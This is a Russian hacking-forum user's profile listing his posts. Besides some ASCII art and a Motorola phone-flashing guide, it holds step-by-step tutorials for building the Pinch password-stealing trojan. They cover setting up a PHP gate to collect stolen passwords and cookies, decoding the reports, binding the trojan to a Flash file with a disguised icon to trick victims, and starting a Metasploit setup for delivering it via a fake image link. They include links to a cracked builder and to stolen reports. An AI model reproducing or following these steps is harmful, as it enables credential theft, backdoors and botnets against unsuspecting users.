NARCOMAN.exe

Отвечающие
  • Публикаций

    13
  • Зарегистрирован

  • Посещение

Весь контент NARCOMAN.exe

  1. NARCOMAN.exe

    Идеальная девушка с другой стороны

    Эмммм... а я за все качества по немногу ! __________________88888888888888888888888888 _______________8888ooo8888888888888888888888888 _____________8888oooooo8888888888888888888888888888 ____________88oooooooo888ooo8888888888888888888888888 __________88888888oooo8ooooooooooo88888888888888888888 ________888_8oo888888oooooooooooooooooo88888888888 888 ___________88oooo88888888oooomoooooooooo88888888888 8 _________888888888888888888oMooooooooooo8888888888888 ________88888888888888888888ooooooooooooM88888888888888 ________8888888888888888888888oooooooooM8888888888888888 _________8888888888888888888888oooooooM888888888888888888 ________8888888888888888oo88888ooooooM88888888888888888888 ______88888888888888888ooo88888oooooM888888888888888 8888 _____88888888888888888ooo88888ooooMoo;o*M*o;888888888 88 ____88888888888888888ooo8888oooooMooooooooooo88888888 8 ___88888888888888888oooo88ooooooMo;ooooooooooo888888888 __8888888888888888888ooo8ooooooMooaAaooooooooM8888888888_______ __88___8888888888oo88oooo8ooooMooooooooooooo888888888888888_8888 _88__88888888888ooo8oooooooooMoooooooooo;oo88o88888888888888888 _8__8888888888888oooooooooooMoo@@@@@oooo8w8888888888888888 __88888888888o888ooooooooooMooooo@a@oooooM8i888888888888888 _8888888888oooo88oooooooooM88oooooooooooooM88z88888888888888888 8888888888ooooo8oooooooooM88888oooooooooMM888!888888888888888888 888888888ooooo8oooooooooM8888888MAmmmAMVMM888*88888888___88888888 888888_MoooooooooooooooM888888888oooooooMM88888888888888___8888888 8888___MooooooooooooooM88888888888ooooooMM888888888888888____88888 _888___MoooooooooooooM8888888888888MooooomM888888888888888____8888 __888__MooooooooooooM8888o888888888888oooomooMm88888_888888___8888 ___88__Moooooooooooo8888o88888888888888888ooooooMm8___88888___888 ___88__Moooooooooo8888Moo88888oo888888888888oooooooMm88888____88 ___8___MMoooooooo8888Mooo8888ooooo888888888888ooooooooMm8_____8 _______8Mooooooo8888Mooooo888ooooooo88ooo8888888ooooooooMm____8 ______88MMooooo8888Mooooooo88oooooooo8ooooo888888oooMoooooM _____8888Mooooo888MMoooooooo8oooooooooooMoooo8888ooooMooooM ____88888Mooooo88oMoooooooooo8oooooooooooMooo8888ooooooMooM ___88_888MMooo888oMoooooooooooooooooooooooMo8888oooooooooMo ___8_88888Mooo88ooMoooooooooooooooooooooooMMo88ooooooooooooM _____88888Mooo88ooMoooooooooo*88*ooooooooooMo88ooooooooooooooM ____888888Mooo88ooMooooooooo88@@88ooooooooMoo88ooooooooooooooM ____888888MMoo88ooMMoooooooo88@@88oooooooMooo8ooooooooooooooo*8 ____88888__Mooo8ooMMooooooooo*88*ooooooooooMooooooooooooooooo88@@ ____8888___MMooooooMMoooooooooooooooooooooMMooooooooooooooooo88@@ _____888____MoooooooMMoooooooooooooooooooMMooMooooooooooooooooo*8 _____888____MMoooooooMMMooooooooooooooooMMoooMMoooooooooooooooM ______88_____MooooooooMMMMoooooooooooMMMMoooooMMooooooooooooMM _______88____MMoooooooooMMMMMMMMMMMMMooooooooMMMooooooooMM ________88____MMooooooooooooMMMMMMMooooooooooooMMMMMMMMMM _________88___8MMooooooooooooooooooooooooooooooooooMMMMMM __________8___88MMooooooooooooooooooooooMoooMooooooooMM ______________888MMooooooooooooooooooMMooooooMMooooooMM _____________88888MMoooooooooooooooMMMooooooomMoooooMM _____________888888MMoooooooooooooMMMoooooooooMMMoooM ____________88888888MMoooooooooooMMMoooooooooooMMoooM ___________88_8888888MoooooooooMMMooooooooooooooMoooM ___________8__888888_MoooooooMMoooooooooooooooooMoooMo ______________888888_MooooooMoooooooooooooooooooMoooMM _____________888888__MoooooMooooooooooooooooooooooooMoM _____________888888__MoooooMooooooooo@ooooooooooooooMooM _____________88888___Moooooooooooooo@@oooooooooooooooMooM ____________88888___Moooooooooooooo@@@ooooooooooooooooMooM ___________88888___Mooooooooooooooo@@ooooooooooooooooooMooM __________88888___Mooooomoooooooooo@ooooooooooMmoooooooMoooM __________8888___MoooooMoooooooooooooooooooooooMMoooooooMoooM _________8888___MoooooMoooooooooooooooooooooooMMMooooooooMoooM ________888____MoooooMmooooooooooooooooooooooMMMoooooooooMooooM ______8888____MMooooMmoooooooooooooooooooooMMMMooooooooomoomoooM _____888______MoooooMooooooooooooooooooooMMMooooooooooooMoommoooM __8888_______MMoooooooooooooooooooooooooMMooooooooooooomMooMMoooMo _____________MoooooooooooooooooooooooooMooooooooooooooomMooMMoooMm ____________MMoooooomoooooooooooooooooooooooooooooooooooMooMMoooMM ____________MooooooooMoooooooooooooooooooooooooooooooooooMooMoooMM ___________MMoooooooooMoooooooooooooMoooooooooooooooooooooMoMoooMM ___________MoooooooooooM88oooooooooMoooooooooooooooooooooooMMooMMM ___________Moooooooooooo8888888888MooooooooooooooooooooooooMMooMM ___________Mooooooooooooo88888888MoooooooooooooooooooooooooMooMM ___________Moooooooooooooo888888MoooooooooooooooooooooooooMooMM ___________Mooooooooooooooo88888MoooooooooooooooooooooooooMoMM ___________Mooooooooooooooooo88MooooooooooooooooooooooooooMMM ___________MoooooooooooooooooooMooooooooooooooooooooooooooMMM ___________MMoooooooooooooooooMooooooooooooooooooooooooooMMM ____________MoooooooooooooooooMooooooooooooooooooooooooooMMM ____________MMoooooooooooooooMooooooooooooooooooooooooooMMM _____________MoooooooooooooooMoooooooooooooooooooooooooMMM _____________MMoooooooooooooMoooooooooooooooooooooooooMMM ______________MoooooooooooooMooooooooooooooooooooooooMMM ______________MMoooooooooooMooooooooooooooooooooooooMMM _______________MoooooooooooMoooooooooooooooooooooooMMM _______________MMoooooooooMoooooooooooooooooooooooMMM ________________MoooooooooMooooooooooooooooooooooMMM ________________MMoooooooMooooooooooooooooooooooMMM _________________MMooooooMoooooooooooooooooooooMMM _________________MMoooooMoooooooooooooooooooooMMM __________________MMooooMooooooooooooooooooooMMM __________________MMoooMooooooooooooooooooooMMM ___________________MMooMoooooooooooooooooooMMM ___________________MMoMoooooooooooooooooooMMM ____________________MMMooooooooooooooooooMMM ____________________MMooooooooooooooooooMMM _____________________MoooooooooooooooooMMM ____________________MMooooooooooooooooMMM ____________________MMoooooooooooooooMMM ____________________MMooooMoooooooooMMMo ____________________mMMooooMMoooooooMMMM _____________________MMMoooooooooooMMMoM _____________________mMMoooMoooooooMoMoM ______________________MMooMMMMoooooooMoM ______________________MMooMMMooooooooMoM ______________________mMMooMMooooooooMoM _______________________MMooMMoooooooooMoM _______________________MMooMMooooooooooMom _______________________MMoooMoooooooooooMM _______________________MMMoooooooooooooooMo _______________________MMMoooooooooooooooMo _______________________MMMooooooooooooooooM _______________________MMMooooooooooooooooM _______________________MMMooooooooooooooooMm ________________________MMooooooooooooooooMM ________________________MMMoooooooooooooooMM ________________________MMMoooooooooooooooMM ________________________MMMoooooooooooooooMM __________________
  2. NARCOMAN.exe

    Троянский вирус, как создать.

    Сейчас я вам расскажу как создать свой троянский вирус (практически свой)! Что вам нужно: мозги-1шт., компьютер-1шт., доступ в инет-1шт., Pinch (билдер)-1шт., сервер (для отчётов Трояна)-1шт., Парсер (для расшифровывания отчётов). Пожалуй всё… Теперь как всегда краткая история. Трояны .. о них знали ещё 33 века назад В 12 веке до н.э. Греция объявила войну городу Трое. Конфликт возник, когда троянский принц похитил царицу Спарты Елену и объявил, что хочет сделать её своей женой. Это, естественно, обозлило греков, особенно царя Спарты. Греки осадили Трою на 10 лет, но безуспешно, т.к. Троя была хорошо укреплена. В последнем усилии греческая армия сделала вид, что отступает и оставила позади огромного деревянного коня. Троянцы увидели коня и, подумав, что это подарок от греков, затащили коня в город, не догадываясь, что внутри пустого деревянного коня сидели лучшие греческие солдаты. Под покровом ночи солдаты выбрались наружу, открыли ворота города и позже вместе с оставшейся армией перебили всю троянскую армию. Подобно деревянному коню, программа Троянский конь притворяется, что делает одно, а на самом деле делает совершенно другое. Алексей Демченко - Русский Кул Хацкер известен ещё как «aka coban2k» Автор множества программ, а его лучшей (на мой взгляд) программой есть ПИНЧь самый распространенный Троян в интернете ! Знает много языков программирования в частности: С++, Pascal, Delphi, MySQL, PHP, XML и многие другие. А вообще советую зайти на его личный сайт www.cobans.net, там найдете небольшую инфу о нем. В частности мы рассматриваем программу ПИНЧь (Pinch 2.58) Pinch 2.58 – это Билдер, компилятор троянских виросов… т.к. вы в билдоре задоёти определенный функции Трояну… например: украсть пороли от ICQ, TheBat, FAT, Куки браузера (это самое популярное). НО это и не всё Pinch может также: создать/отредактировать определенный параметр в Реестре, удалить сам себя после завершения работы, создать «Синий экран смерти», или ещё лучше создать сервер (консоль) на компе жертвы (BackDoor), после чего комп жертвы это ваша собственность (в прямом смысле слова). Вы можете совершать DDOS атаки через его комп через его IP адрес, и сохранять в этот момент совой анонимный суверенитет. Только не думайте что вашем распоряжение может быть всего один комп. У вас их может быть столько сколько вы за хотите, но это уже называется БотНет (BotNet)… Ну вот и всё, пожалуй начнем… Как из себя выглядит Билдер Pinch`a смотрим ниже: Рисунок 1.1 Теперь объясняю принцип работы Трояна… 1. Вы можете скомпилировать Троян так чтобы отчёты приходили на указанный вами Е-маил. Но вас могут спалить (тоесть ваш Троян) т.к. у вашей жертвы может стоят SP2 (Windows XP Service Pack 2)) значит и ФаирВол имеется… ФаирВол не за что не включит (без вашего разрешения) 25 порт (SMTP) значит ваш Трои не сможет отправить отчёт жертвы на Е-маил. (на такие известные почтовики как mail.ru yandex.ru и т.д. отчёты не приходят) Пользуйтесь почтовиком http://goolook.ru Но всё равно я не советую пользоваться SMTP ! 2. Вы можете скомпилировать троян так чтобы отчёты приходили на указанный вами сервер. Это безопаснее т.к. в момент отправки отчёта Pinch проявляет себя как: Имя процесса: iexplorer.exe Протокол: http Удаленный адрес: www.ВАШ_СЕРВЕР.xxx/гет.php ФаирВол не может воспрепятствовать процессу «iexplorer.exe» (а если бы и мог то вы бы на мониторе своего компа НЕ ВИДИЛИ бы не чего (кроме картинки рабочего стола)) Протокол: http:// значит и порт «80» (БЕС КОММЕНТАРИЕВ) Так, сегодня мы будем рассматривать «2-ое» я уже говорил да (?) что это лучше. Посмотрим ещё рас на Билдер >>> Рисунок 1.1 1. Нажмите на вкладку «HTTP» вы берите протокол «HTTP». 2. В поле URL ведите адрес своего сайта (сервера) например: http://kuzia_lox.jino-net.ru/mailp_p/mail.php На этом мы остоновимя поподробнее… Чтобы Pinch прислал вам отчёты по http:// вам нужен сервер (давайте это называть проще «сайт») и так вам нужен сайт НА КОТОРОМ ДОЛЖНЫ ОБЕЗАТЕЛЬНО РАБОТАТЬ PHP СКРИПТЫ !!! Самый лучший из них это http://jino-net.ru Правда я говорил, что есть ещё и http://onepage.ru/ ноооо сервер уничтожен. Продолжим… Так вот регистрируетесь на http://jino-net.ru под любым доменом под любым паролём ). Зарегистрировались ? Думаю да… Продолжим… Допустим вы зарегистрировались под доменом http://petia_lox.jino-net.ru Заходим на FTP вашего сайта. Вы знайте что такое FTP ? Эхххх… Придётся рассказать, так как вспоминаю себя… FTP – это содержимое вашего сайта… тоесть по протоколу FTP (21 порт) вы попадайте в корень своего сайта где содержатся разные каталоги/папки/файлы и т.д. Идём в Google.ru и качаем программу «CuteFTP»… Пожалуй я сделаю это за вас. Идём сюда >>> http://www.google.ru/search?hl=ru&q=Cu...+Google&lr= Мене так больше нравится 4-ая ссылка. Скачать CuteFTP 7.1 + Русификатор Идём >>> http://gizmodo.ru/2005/07/23/skachat_cutef...1__rusifikator/ Думаю дальше вы сообразите как скачать программу и как её установить. Скачали, установили, русифицировали… всё продолжим… Теперь зайдите на FTP своего сайта. Зайдите в папку /docs/ создайте в этой папке любую папку например «mail_p» дайте этой папке права CHMOD 777 (нажмите правой кнопкой мыши на папку в контекстном меню найдите параметр «CHMOD» или «Свойства» в разных версиях программы CuteFTP разный перевод) Теперь залейте гет в эту папку (mail_p). Что такое гет ? «Гет» этот cкрипт гейта для приема отчетов от пинча имеет расширение «.php» Его можно взять сдеся >>> http://pinch3.ru/other/gate.txt Создайте у себя на компе текстовый файл «Блокнот» скопируйте вес текст гейта http://pinch3.ru/other/gate.txt <<< в свой текстовый фаил >>> дайте расширение текстовому файлу .php (был раньше .txt) Всё скрипт готов переименуйте его в «mail» залейте его на FTP своего сайта в папку /docs/mail_p/ И дайте CHMOD права этому файлу 777. Запомните это место теперь сюда в эту папку где находится гет (/docs/mail_p/) будут приходить отчёты. Так пишем в поле URL (в билдере если вы не забыли ещё) http://petia_lox.jino-net.ru/mail_p/mail.php (у вас свой адрес) 3. Смотрим >>> Рисунок 1.2 Сделайте все флажки как у меня на рисунке 1.2 Не делайте флажок над параметром «Opera» а то отчёт не расшифруется (читаем ниже). Можно уже компилировать… но мы рассмотрим ещё и другие дополнительный (хотя они иногда даже обязательные) функции… 1. Вкладка «PWD» мы уже знаем что такое ) 2. Вкладка «Run» для эмммм скажем так для одоренния интеллекта Pinch`a тоесть для само удаления, для сохранения своих .dll в Windows`e и многое другое. 3. Вкладка «Spy». Отослать скриншот монитора жертвы, для сохранения КейЛога IE и т.д. 4. Вкладка «NET» для консольных команд PHP notify/ Остальное незнаю… 5. Вкладка «BD» любимый БегДор не разу не пользовался именно от Pinch`a… 6. Вкладка «etc» для сжатия Трояна, для изменения иконки троя. 7. Вкладка «Kill» для уничтожения каких-либо процессов (например ФаирВол) 8. Вкладка «IE» управление IE, добавление сайта в избранное, переход по ссылке. 9. Вкладка «Worm» незнаю… что то связанос ДНСеками. 10. Вкладка «IRC-bot» нууу вообщем эт для боттрака. БОТНЕТ рулит ) !!! Возвращаемся во вкладку PWD и нажимаем кнопку (внизу) «COMPILE» УРА !!! ТРОЯН ГОТОВ !!! Имя только что скомпилированного файла «Pinch.exe» находится в той же папке где и БИЛДЕР. Если Троян не скомпилировался и вылетела ошибка «Cannot find icon file» Зайдите во вкладку «etc» и уберите флажок над параметром «Add icon» Всё… теперь… можете протестировать свой Троян на себе… Нажмите левой кнопкой мыши на Pinch.exe два раза. Этого достаточно. Смотрите папку /docs/mail_p/ Пришёл отчёт (название что то вроде 21_26-09.10.2006_195.131.217.151_pass.bin) расширение .bin тоесть бинарный КОД… если кто не знает это 1101010101010001010101 Хыыыыыыыы… Двоичная система счисления. Как его расшифровать ? Через парсер, это программа специальная для расшифровки отчётов от Pinch`a. Парсер Рисунок 1.1 1. Создайте папку «reports» да диске С:\ 2. Залейте в папку Parser2.exe 3. Зайдите в программу Parser2.exe 4. В поле «Profile name» ведите желаемое вами имя у меня пусть будет «XXX». 5. В поле «Data file» напишите C:\reports\bd.dat это База Данных ваших отчётов. 6. В поле «Reports folder» напишите C:\reports\ 7. Нажмите наконец-то OK !!! ВСЁ… Теперь залейте в папку C:\reports\ отчёт который вам пришёл (.bin) Запустите Parser2.exe Всё готова… Вот мои отчёты, 33 отчёта за один день смотреть дату !!! До этого вам ещё далеко, но запомните если вы этим займетесь в серьез КАКИМ бы вы небыли кривым, косым, дурным, глухим, желательно не слепым вы этого достигнете. Время не стоит на месте ! А та СВОБОДА что дарёная вам с РОЖДЕНИЯ даёт вам огромный мир выбора !!! "Свобода лечит лучше всего..." А.С. Нейл, Саммерхил Да сохранит вас Drum’n’Bass от Одела «К» Copyright text by NARCOMAN 2006 © А теперь ссылки ) Вы думали я про вас забыл Хныыыы ! НЕА неполучится !!! Поехали… Пинчь (Pinch 2.58) http://pyccxak.ucoz.ru/Pinch_2.58_cracked_by_h0t_uRHG.rar --- уже крякнутый билдер, архив бес пароля. На будущие Pinch 2.58 платный Троян и крякоется только на компах Windows XP SP2. Парсер http://www.pinch2.nm.ru/parser.2.pro.v2.14.rc4.zip В следующих статьях я напишу: Как впарить Троян ламеру (примеры). Как спрятать Троян. И как пользоваться БотНетом чтоб не парится как в парить Троян ламеру. ) И ещё ) Подарок от меня/ 20 отчётов http://slil.ru/23584130 усё понятно ?
  3. Прошивка MOTOROLA E398 с закрытыми глазами ! ФРИКИНГ-язык: ---------------------------------------------------------- Тело ----- это ТЕЛЕФОН (сотовый) Сотовый -- это ТЕЛО (смотрим выше) П.О. ------ программное обеспечение Монстр-паг --- Типо Патча к игре (если вы незнаите что такое ПАТЧь, РЕКОМЕНДОВАНО дальше и не читайте !!!) Лингк-паг ------ Патчь с набором разных языков для ТЕЛА Бекап ----------- БазаДанных вашего ТЕЛА формата .shx ---------------------------------------------------------- Урок истории. 1 день) БОГ создал провод. 2 день) БОГ создал тело. 3 день) БОГ захотел в туалет. 4 день) у БОГА порвался провод. 5 день) БОГ придумал мобильник. 6 день) БОГУ не понравилось "П.О." мобилника 7 день) БОГ ПРОШИЛ ТЕЛО ------ 8 день) БОГУ не понравилась прошивка версией 372. Бог стал ждать 2006-ой год. 9 день) БОГ дождался и прошил своё тело. 10 день) БОГ КАЙФУЕТ. ---------------------------------------------------------- И так начнём ? Покаты разменаеш своё тело, я раскожу сейчас тебе нашу с тобой задачу. От тебя требуется МОБИЛЬНЫЙ ТЕЛЕФОН "Motorola E398" (рабочий - заряженный ПОЛНОСТЬЮ) - одна штука. USB кабель (родной как МАМА) - одна штука. Терпение - одна штука. Руки - две штуки (желательно не с ЖО_Ы) Голова - одна штука (рекомендации: голова после выходных считать НЕГОДНОЙ). Ну вот пожалуй и всё ) Хотя НЕТ. Скачайте: Прошивку: http://files.rufon.net/prsh/e398/r373_g_0e...42r_for_all.zip ~ 17Мб. Монстр-паг: http://ifolder.ru/218764 сылка на форум с описанием МОНТРА: http://motofan.ru/board/index.php?showtopic=78138 ~ 19Мб. Программа для прошивания и создания Бекапа тела "FlashBackup 2.62": http://supertrubka.com1.ru:8019/WWW/moto/s...BackUp_E398.rar ~ 500Кб. ---------------- Объясню. Полное имя прошивки r373_g_0e.30.42r Где r373 это платформа. Где 42r это знак из ВНЕ. Вообще 42r прошивки для востоновления телефона. (это эдокая профилактика, для вас лучше) Полное имя МОНСТРА r373_Mpx398_Final_49r Где r373 это указывает на какую платформу устанавливать данный МОНСТР. Где Mpx398_Final_49r это и есть сам МОНСТР-ПАГ. 49r Final это самое новое и самая последняя прошивка на данный момент когда пишется эта ХРЕНЬ. ---------------- Ну от меня лишь требуется мой УНИКАЛЬНЫЙ ФРАЗИОЛОГИЗМ. ) Поехали... +===============================+ 1) Вставь в мобилник USB, вставь USB в компьютер. 2) Выключи телефон не вынемая USB из компа. 3) Нажми на телефоне * (звёздочку) # (решотку) и Кнопку включения телефона (Красная цветом) и ДЕРЖИ 10сек. 4)Это называется "РЕЖИМ FLASH". 5) Включаем программу "FlashBackup 2.62" (программа не требует установки) в низу должно появится надпись "Телефон подключен" (зелёным цветом) 6) Нажимаем вкладку "Резервные копии" выберите следующие >>> Режим работы: >>> вся память телефона / Размер памяти телефона: >>> Avto / Нажмите напротив этих ОПЦИЙ кнопку "СОЗДАТЬ". >>> процесс создания Базы Данных "Бекап" начался <<< 7) Всё. Бекап создан !!! Если твой телефон ещё не ГОРИТ пламенем я готов назвать тебя МОЛОДЕЦ !!! 8) И так. посмотри на пункт 5) оцени ситуацию на мониторе. Всё нормально ? Поехали... 9) Нажми в программе "FlashBackup 2.62" на вкладку "Прошивальщик" / Выбери прошивку (не Монстр-паг) то есть r373_g_0e.30.42r (что бы это сделать, сначала ты должен вытащить прошивку из Архива (который ты скачал)), расширение (формат) прошивки должно быть .shx (если ты сейчас почувствовал себя растереным и не понимаешь о чём это Я) то просто ЗАБУТЬ. Выключить компьютер, и лажись спать. Если ты всё понял, то ФЛАГ ТЕБЕ В РУКИ, едим дальше, выбирай эту прошивку <<< "R373_G_0E.30.42R_PDS004_LP002E_DRM0101_JPJAVA_G_0E_E790_00_00_21I_SE7007AXX U107A_for_all.shx" >>> Выбрал ? Молодец. 10) Сейчас ты увидел в поле "Выберите кодовые группы, которые надо прошить" свойства твоей прошивки. Это ты видишь то на что способна твоя прошива. ПУСТЬ ВСЕ ГАЛОЧКИ СТОЯТ НА СВОЁМ МЕСТЕ. 11) Нажимай смело "ПРОШИТЬ". Жди минут 15. Примечание: не которые процессы прошивки не отображаются ЭТО НОРМАЛЬНО ! 12) Всё ты прошит ! 13) Включи телефон, по шарся. ОТСТОЙ. ) Согласен... Поехали далее>>> повтори пункты 1), 2), 3), 5) 14) Нажми в программе "FlashBackup 2.62" на вкладку "Прошивальщик" / Выбери Монстр-паг (который мы скачали) <<< Mpx398_Final_49r_2006-09-28.shx >>> 15) Сейчас ты увидел в поле "Выберите кодовые группы, которые надо прошить" свойства твоего Монстр-пага... Заметь их больше чем в прошивки ПУСТЬ ВСЕ ГАЛОЧКИ СТОЯТ НА СВОЁМ МЕСТЕ. 16) Жми ПРОШИТЬ ) Примечание: не которые процессы прошивки не отображаются ЭТО НОРМАЛЬНО ! 17) Ждииии..... 18) Ждииии..... 19) Ждииии..... 20) Ждииии..... 21) Всё ты прошит !!!! Дождись когда тело отключится и вынимай USB (в это время кричи УРА), выключай компьютер, беги на улицу, раздевайся до гола и снимай себя на СОТОВЫЙ. +===============================+ Всё данные что были раньше (до прошивки) на Мобильном. Уничтожаутся !!! Телефон МАТОРОЛА не возможно убить МЫШКОЙ. ) Все приветы и пожелания и слюни в РИПУТАЦИЮ >>> ---------------- Если у кого-то телу настал КИРДЫК ! Стучите мну в асю... ---------------- Read me dy NARCOMAN / ICQ# 232330 / 2006 (с) ----------------
  4. NARCOMAN.exe

    Немного о троянах

    не не забыл просто... лан харе офтопить, по теме пишем )
  5. NARCOMAN.exe

    Немного о троянах

    konoplyanik Молочина УВАЖАЮ ! На http://inattack.ru/forum/index.php запости ОБЕЗАТЕЛЬНО !
  6. NARCOMAN.exe

    Троянский вирус, как спрятать.

    Да всё делал уже и ИРК и Чат и бля ! Эт вы сами не пишите мене и не задоёти свои вопросы. Нууууу значет не хотите учиЦо ! Нуууу так как у нас Свобода и вы Свободные люди и темболее сидите на Свободном форуме Тоооо иди НА ) Уха-ха-ха
  7. NARCOMAN.exe

    Троянский вирус, как спрятать.

    В предыдущей статье я объяснил как создать троянский вирус типа Pinch`a. Но что жи теперь ? Скажите вы… как в парить этот Троян ламеру или да же не ламеру а просто пользователю сети. Достаточно легко ! Всё завист от вас и от того как вы спрятали свой Трой. Иногда даже всё зависит от человеческого фактора. Ну об это чуть позже (следующая статья). И так как же спрятать Троян!? Чтобы спрятать Троян вам нужен приватный софт (ваша программа или платная). Я расскажу вам как это сделать с помощью паблик софта (программы свободного распространения). Тоесть как таковой Троян вы не спрячете, но хотя бы будете знать как это делать в будущем с помощью приватного софта. Сейчас я объясню чем отличается приватный софт от паблика. Паблик софт - это программы свободного распространения тоесть они бесплатные и их можно легко скачать по ссылке на каком небуть все общем хак форуме. Приватный софт – это программы/программа написанная вами или купленная по вашему заказу у программиста. Тоесть просто так эту программу в сети не скачаешь. Запомните ещё кое что мой дорогие читатели ) Собственно говоря в этой статье привата вы не найдете. А если я даже выложу приватную программу она тут же станет пабликом и за того ФАКТА что я её выложил. Тоесть она уже будет палится всеми Антивирусами что есть на этом белом свете. Довольно теории. Переедем к практике. Что вам будет нужно: МОЗГИ. (свои) Две руки. (можно с одной) Сам Pinch. (скомпилированный) MicroJoiner (Клей) Restorator 2005 (для вытягивания Иконок из .exe или .dll файлов) Ну вот и всё. Начнём… Отройте программу MicroJoiner. Эта программа будет склеивать наш трой с чем угодно. Рис 1.1 Добавте в программу для склеивания нашего уже скомпилированного троя. Рис 1.2 Добавте по вашему усмотрению любой фаил для склеивания. В нашем случи это будет Flash мульт «Пиво и Девки» Рис 1.3 Что бы добавить иконку нам нужно её изъять из .exe файла или .dll модулей (в нашем случи флешки). Откуда взять иконку флешки (?) из флеш проигрывателя. Я думаю у каждого есть установленный на компьютере флеш проигрыватель. Для этого возьмём программу Restorator 2005. Откроем программу Рис 2.1 Откроем .exe фаил флеш проигрователя. Рис 2.2 В директор icon есть две иконки заберём одну из них мне так больше нравится иконка под номером 608. Рис 2.3 Вернёмся в MicroJoiner. И добавим нашу иконку. Рис 1.4 Теперь мы можем склеить нашего троя с этой флешкой. К сожалению фаил будет иметь расширение .exe а не .swf как положено. Но зато будет иконка флешки. Мы ведь расщитываем на ламеров ) Рис 1.5 Рис 1.6 Вот пожалуй и всё. Copyright text by NARCOMAN 2007 © Можно конечно самому спрятать Троян. Тоесть как не с помощью программ типа MicroJoiner а самому с помощью например языка программирования Delphi. И с помощью глубоких познаний в криптографии… Не которые называют это даже искусством. Ссылки: MicroJoiner http://www.cobans.net/files/mj17ru.zip Restorator 2005 http://softok.org/business/othbuh/14060prog.html
  8. NARCOMAN.exe

    Троянский вирус, как создать.

    Князь и Грешники иди НА Я ЖИВ )
  9. NARCOMAN.exe

    Троянский вирус, как в парить.

    Привет ламер ) В предыдущих статьях я рассказывал как создать и как спрятать троянский вирус. И так ты создал, спрятал и думаешь а как мне его в парить лоху ? Хммм... Есть много способов и ты о них наверняка уже знаешь… Но я тебе хочу предложить более экзотический способ, более профессиональный способ, который наверняка поможет тебе в будущим занимала чем то эдаким УЖАСНЫМ. Короче ты меня понял. НЕ ТУПИ ! ------------------------------ Ты когда небуть хотел дать троя своей жертве так чтоб она даже не думала что это что то плохое ? Например вот по такой ссылке > http://madona.zapto.org/madona.jpg ? Я знаю, ты не только хотел это сделать ты МЕЧТАЛ об этом !!! Вот на этом предисловие и остановимся. Собственно сегодня мы это и будим делать ! ------------------------------ Ну как всегда. Что нам нужно ? Нам нужна так называемая консоль «Metasploit Framework 3» (рус. «МетаСплоит») + нам нужна «плохая программа» (ну в смысле трой, вирус или бот) предлагаю «Pinch» + нужна программа «No-Ip DUC» и регистрация на сайте no-ip.com + нужна голова и желание. Что же такое «Metasploit» ? Ну начнем с того что же вообще такое «Exploit» (рус. «Сплоит»). ----------- Exploit – это общий термин в сообществе компьютерной безопасности для обозначения фрагмента программного кода который, используя возможности предоставляемые ошибкой, отказом или уязвимостью, ведёт к повышению привилегий или отказу в обслуживании компьютерной системы. (с) ru.wikipedia.org ----------- Shell-код, код оболочки (англ. shellcode) — это двоичный исполняемый код, который обычно передаёт управление консоли, например '/bin/sh' Unix shell, command.com в MS-DOS и cmd.exe в операционных системах Microsoft Windows. Код оболочки может быть использован как полезная нагрузка эксплойта, обеспечивая взломщику доступ к командной оболочке (англ. shell) в компьютерной системе. (с) ru.wikipedia.org ----------- Metasploit – это пакет имеющий два варианта работы: msfconsole (консольный) и web- интерфейс msfweb. Удобней всегда работать в msfconsole. Это интерфейс командной строки (по типу cmd с минимальным набором команд), имеющий собственное программное окружение и систему команд. (с) antichat.ru ----------- Для чего нам нужна плохая программа ? )=D БЕС КОММЕНТАРИЕВ ! ----------- А для чего нужна тогда программа «No-Ip DUC» и регистрация ? Это чтобы ссылка выгладила красива. ((http://madona.zapto.org/) за вместо IP адреса) Вообще скажу так, No-Ip.com предоставляет доменное имя для ДИНОМИЧИСКИХ Ip-адресов (в смысле домен). И предоставляется это БЕСПЛАТНО (смотря какой домен). А программа «No-Ip DUC» привязывает этот домен к твоему Ip-адресу. ------------------------------ Ну всё с теорией покончено ! Давайте же посмотрим что из себя представляет «Metasploit Framework 3» визуально >>> Рис 1.1 ----------- Наш «Metasploit Framework 3» имеет 116 Exploit`ов и 99 Shell`ов =[ msf v3.0-beta-dev + -- --=[ 116 exploits - 99 payloads + -- --=[ 17 encoders - 4 nops =[ 17 aux ----------- ----------- Наберём команду Help (справка) Рис 1.2 Команды >>> ? ---------------------- Help menu (вывод этого хелпа на экран) Back ----------------- Move back from the current context (переместиться назад от текущего контекста) Banner --------------- Display an awesome metasploit banner (выводит на экран баннер Metasploit`а (то что выводится в начале)) Cd --------------------- Change the current working directory (смена рабочей директории) Exit -------------------- Exit the console (выход из консоли) Help -------------------- Help menu (вывод этого хелпа на экран) Info --------------------- Displays information about one or more module (Вывести на экран информацию об одном или нескольких модулях) Irb ----------------------- Drop into irb scripting mode (Упасть (перейти) в irb скриптинг режим) Jobs --------------------- Displays and manages jobs (Отобразить и управлять задачами) Load --------------------- Load a framework plugin (Загрузить плагин фрамворка) Loadpath ---------------- Searches for and loads modules from a path (Поиск путей загруженных модулей) Quit --------------------- Exit the console (Выход из консоли) Route ------------------- Route traffic through a session (Маршрут траффа через сеанс) Save -------------------- Saves the active datastores (Сохранить активную историю данных) Sessions ---------------- Dump session listings and display information about sessions (Дампит листинг сессий и выводит информацию о них) Set --------------------- Sets a variable to a value (Устанавливает значение переменной) Setg -------------------- Sets a global variable to a value (Устанавливает значение глобальной переменной) Show ------------------- Displays modules of a given type, or all modules (Выводит на экран модули по типу или все модули) Sleep ------------------- Do nothing for the specified number of seconds (Бездействие столько-то секунд) Unload ------------------ Unload a framework plugin (Выгрузить плагин фрамворка) Unset -------------------- Unsets one or more variables (Сбросить одну или более переменных) Unsetg ------------------- Unsets one or more global variables (Сбросить одну или более глобальных переменных) Use ------------------------ Selects a module by name (Использовать (выбрать) модуль (эксплоит) по имени) Version ------------------ Show the console library version number (Показать номер версии фрамворка и консоли) (с) antichat.ru ----------- Давайте наберём команду show exploits Рис 1.3 Мы видим список Exploit`ов… он прекрасен ) ----------- Давайте наберём команду show payloads Рис 1.4 Мы видим список Shell`ов… ----------- Теперь ты понял что такое команды и консоль. И как они выглядят и как работают. ------------------------------ Так. Давай скачаем «Metasploit Framework 3» и установим его. Собственно качаем >>> http://metasploit.com/projects/Framework/msf3/#download Скачиваем именно: 3.0 Beta 1 framework-3.0-beta-1.exe Windows 2000/XP/2003 (bundled Cygwin) Во избежание каких либо неурядиц ) потому как статья пишется именно под v. 3.0 Beta 1 Рис 2.1 И постепенно мы переходим к практике… ----------- Скачали ? Устанавливаем именно в C:\Program Files\ по умолчанию. Так будет легче мне с тобой работать дальше ) Вот наш «Metasploit Framework 3» С:\Program Files\Metasploit\Framework3\msfconsole.bat <<< 